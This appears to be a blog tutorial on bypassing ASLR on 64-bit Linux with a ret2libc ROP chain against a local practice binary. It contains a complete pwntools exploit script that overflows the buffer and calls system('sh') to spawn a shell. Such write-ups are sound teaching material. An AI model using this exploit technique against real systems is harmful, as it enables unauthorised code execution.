Linux x64 ASLR Bypass
Hey Squad,
Hey Squad,
Today, i will be writing about ASLR Bypass in Linux x64. This is a very unique situation where we have system and /bin/sh inside the binary. We are also going to use pwntools for this.
Smash the Stack
we will use checksec to find the protections.
now, check for ASLR
offset to overflow RIP is 112 + 8 = 120
Exploit
let’s do ret2libc using the functions and variables inside the binary.
A ret2libc is based off the system
function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string sh
; if you pass this string to system
, it will pop a shell.
Our goal is to get a shell. Since NX is enabled, we cannot execute data on the stack. So we have to use a different technique called return oriented programming (rop
). Our library does not have the function system
but the linked C standard library does. Making use of the loaded libc library in memory, we redirect the control flow to call this function:
system("sh")
Instead of putting shellcode on to the stack, we put pointers and function arguments. Those pointers help us to put the function argument (“sh”) into the proper register and finally call the system function.
In 64-bit binaries, function parameters are passed in registers. RDI, RSI, RDX, RCX, R8 and R9 hold the first six parameters. Any further parameter is passed on the stack. Before returning to an interesting function, 64-bit binaries require that the respective function parameters are loaded in the aforementioned registers.from pwn import *
elf = ELF('./vuln')
rop = ROP(elf)
io = process('./vuln')
pop_rdi = p64((rop.find_gadget(['pop rdi', 'ret']))[0])
ret = p64((rop.find_gadget(['ret']))[0])
binsh = p64(next(elf.search(b'sh')))
system = p64(elf.sym['system'])
payload = b'A'*120 + pop_rdi + binsh + ret + system
io.sendline(payload)
io.interactive()
Shell
Please give a clap if you found it to be useful and follow me to get more hacking knowledge.
Resources
- https://stacklikemind.io/ret2libc-aslr
- https://medium.com/@iseethieves/intro-to-rop-rop-emporium-split-9b2ec6d4db08
- https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc
- https://book.hacktricks.xyz/reversing-and-exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template